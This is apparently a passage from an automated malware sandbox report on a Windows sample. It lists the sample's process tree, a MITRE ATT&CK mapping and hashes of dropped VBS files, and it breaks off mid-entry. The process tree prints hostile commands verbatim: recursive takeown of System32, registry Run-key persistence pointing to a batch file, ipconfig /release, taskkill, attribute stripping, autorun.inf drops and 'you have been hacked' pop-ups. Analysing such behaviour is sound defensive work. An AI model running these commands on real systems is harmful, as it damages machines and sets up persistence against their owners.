attrib -r -a -s -h "C:\Program Files"
3⤵
- Views/modifies file attributes
PID:5728

C:\Windows\system32\notepad.exe
notepad
2⤵
PID:2736

C:\Windows\system32\calc.exe
calc
2⤵
PID:2408

C:\Windows\explorer.exe
explorer.exe
2⤵
PID:2492

C:\Windows\system32\mspaint.exe
mspaint.exe
2⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:1016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
2⤵
- Drops autorun.inf file
- Drops file in System32 directory
PID:2560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
3⤵
PID:876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
3⤵
PID:1680

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
3⤵
PID:1380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
3⤵
PID:1188

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2200

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
3⤵
PID:800

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
3⤵
PID:1172

C:\Windows\system32\ipconfig.exe
ipconfig /release
3⤵
- Gathers network information
PID:1464

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2628

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:864

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:2040

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:304

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:3372

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:3716

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:4000

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:3328

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:3784

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:3684

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:3388

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:4328

C:\Windows\system32\msg.exe
msg * Virus Detectado
3⤵
PID:4364

C:\Windows\system32\msg.exe
msg * Virus Detectado
3⤵
PID:4504

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
3⤵
PID:4684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:4944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:2500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:3468

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:4532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:1996

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6932

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:2188

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:6232

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:6444

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:6516

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:4964

C:\Windows\system32\calc.exe
calc
3⤵
PID:4972

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:5000

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:5008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:5024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:1788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:5888

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:6364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:6388

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:7000

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:6424

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:6500

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:6540

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:6612

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:5040

C:\Windows\system32\calc.exe
calc
3⤵
PID:5056

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:5064

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:5072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:5084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:5984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:5980

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:6180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:6192

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6976

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:6224

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:6452

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:6508

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:6576

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:5096

C:\Windows\system32\calc.exe
calc
3⤵
PID:3980

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:3872

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:3512

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:4316

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:4484

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:2000

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:3412

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:4292

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:4736

C:\Windows\system32\notepad.exe
notepad
2⤵
PID:2456

C:\Windows\system32\calc.exe
calc
2⤵
PID:2464

C:\Windows\explorer.exe
explorer.exe
2⤵
PID:1236

C:\Windows\system32\mspaint.exe
mspaint.exe
2⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:2948

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
2⤵
- Drops autorun.inf file
- Drops file in System32 directory
PID:2520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
3⤵
PID:924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
3⤵
PID:1624

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
3⤵
PID:288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
3⤵
PID:1424

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1864

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
3⤵
PID:1760

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
3⤵
PID:1620

C:\Windows\system32\ipconfig.exe
ipconfig /release
3⤵
- Gathers network information
PID:632

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1672

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:2372

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:1464

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:1268

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:2372

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:904

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:2796

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:2344

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:1724

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:3248

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:3612

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:3900

C:\Windows\system32\msg.exe
msg * Virus Detectado
3⤵
PID:3940

C:\Windows\system32\msg.exe
msg * Virus Detectado
3⤵
PID:3076

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
3⤵
PID:3348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:3536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:4480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:3596

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:5696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:5712

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6788

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:5888

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:2844

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:2712

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:6056

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:3560

C:\Windows\system32\calc.exe
calc
3⤵
PID:3588

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:3596

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:3632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:4504

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:5852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:5924

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6764

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:5952

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:5584

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:5796

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:6132

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:3656

C:\Windows\system32\calc.exe
calc
3⤵
PID:3664

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:3812

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:3844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:4984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
4⤵
PID:4888

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
4⤵
PID:6140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
4⤵
PID:5284

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6776

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:2516

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
4⤵
PID:5684

C:\Windows\system32\ipconfig.exe
ipconfig /release
4⤵
- Gathers network information
PID:5884

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
4⤵
- Kills process with taskkill
PID:6076

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:3852

C:\Windows\system32\calc.exe
calc
3⤵
PID:3864

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:3892

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3920

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:3420

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:3092

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:4228

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:4628

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:4928

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:4196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:2932

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:1648

C:\Windows\system32\calc.exe
calc
3⤵
PID:300

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:6784

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:2416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:1636

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:1332

C:\Windows\system32\calc.exe
calc
3⤵
PID:4772

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:1536

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:4468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:4600

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:7072

C:\Windows\system32\calc.exe
calc
3⤵
PID:4476

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:7092

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:5164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:5220

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:5256

C:\Windows\system32\calc.exe
calc
3⤵
PID:5336

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:5384

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:5388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:5424

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:5452

C:\Windows\system32\calc.exe
calc
3⤵
PID:5484

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:5544

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:7124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:6128

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:5900

C:\Windows\system32\calc.exe
calc
3⤵
PID:6016

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:2448

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:6420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:6096

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:6468

C:\Windows\system32\calc.exe
calc
3⤵
PID:4388

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:5836

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:6564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:6584

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:6920

C:\Windows\system32\calc.exe
calc
3⤵
PID:1032

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:2812

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:4784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:3908

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:1972

C:\Windows\system32\calc.exe
calc
3⤵
PID:4296

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:1124

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:1984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:4788

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:4444

C:\Windows\system32\calc.exe
calc
3⤵
PID:4256

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:5448

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:5340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:5436

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:5748

C:\Windows\system32\calc.exe
calc
3⤵
PID:3696

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:4148

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:6012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
3⤵
PID:6300

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:1360

C:\Windows\system32\calc.exe
calc
3⤵
PID:6900

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:6104

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
PID:2684

C:\Windows\system32\icacls.exe
icacls "C:\Program Files"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3540

C:\Windows\system32\notepad.exe
notepad
2⤵
PID:348

C:\Windows\system32\calc.exe
calc
2⤵
PID:2116

C:\Windows\explorer.exe
explorer.exe
2⤵
PID:2152

C:\Windows\system32\mspaint.exe
mspaint.exe
2⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:748

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
2⤵
PID:884

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
2⤵
PID:1492

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
2⤵
PID:412

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
2⤵
PID:656

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
2⤵
PID:1988

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
2⤵
PID:2572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"
2⤵
PID:6092

C:\Windows\system32\notepad.exe
notepad
2⤵
PID:6640

C:\Windows\system32\calc.exe
calc
2⤵
PID:6072

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
300B

MD5
88a2fcd93445c8b092324fe1236d31dc

SHA1
f63653fe34d54b7e42e29689a934ed097329128d

SHA256
0783070444c465de8a21f7fc41f61d2bd535e995454e4086b2e01780e96ad419

SHA512
3e44cce194b1cc3d6946d33dee6756f0333edc886f9ebe8149887c2e9b35867575ed47f15b2c384ed37aab3b8e37dae3369e1259d132bdf9bb832c70c09e8085

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
360B

MD5
8d485f3ac2acb6e586e8f1d8af2df57f

SHA1
43e9653ecedbad263a5e015ecaa3eebb7a44feb9

SHA256
530f6ebaf4445acb0855efc516729598a3312aeedd0ef9024da6f347f152e783

SHA512
4105fa612f86d46457f77449c095cd9e1f59dcb4d137bf3d822e4f52f89c517faadfbaa00b07d15aabfc0d2afdb093ea63d59add313525149f17b7427917494b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
420B

MD5
faa4d74ae1348f395723208ea9b5734e

SHA1
d9fcf36438c3b9cfb2f5863b644fd5436f564309

SHA256
1f50be6aaebc58d582685707b23f749ea0db9d028dc9839a144514cf139775c4

SHA512
d5d1409f0948d4393d0cf94b2648dc2929cb53386f54a2c37d92dca14238f88856cc0c3a689818873d48c49a8a686b7bc074d2e0a4ab92ca882be6f42aa69882

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
540B

MD5
2c77e3b1a1fbe57f517a5e20a2276067

SHA1
39b148046cd506d6e77de89363c12cf1a5dddae5

SHA256
2743c84bf8627627d8bc12b948e13740a2370bda01accf49ae68cec93d8fbfd3

SHA512
9656636f516894aab708cdd526e88c69cc943aae6790bd1a11dd56f78fa4e8779b4af1448dfa25da947f735cb74c59b35ed2c5fbda06df2744d8f770ae5ade2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
120B

MD5
6bc9ab9854695874c5338bd08dde7db5

SHA1
8ae8dc91cd8b80dd688378a3eacb2750e2de8c3c

SHA256
d4249fbe2df7ddc684f61bbba98e5d3312c85e5787d5500a73ff18a5abce76eb

SHA512
e8fda27e7d1144816879b84fa04b8b3a7063f3841e57a1aaa918b5dfa1dc35f0f4380f89ca861c59ea45d884488e68309dabff15200e6b99038df4431e439f85

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
180B

MD5
b2206e980c51067d6e9dd7575d842bdc

SHA1
5aa6f76eee9efd569089be7f363e30ebf0531a22

SHA256
add106f3d6e9cfd2fac3d14a74d6791a9caa257b9c7e105a9a5fc2a309337ecd

SHA512
89ab3ca635f8fdcb1206f0a1d585355a730506cc1d72ca666f1e9d650b24107368349b44ab0b3d3132442a2fc61c0c9404d00b717a61f305d9c93d5d638d9bec

Download Submit
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
Filesize
240B

MD5
482dcfe952218cf31ad2adddd8f6616b

SHA1
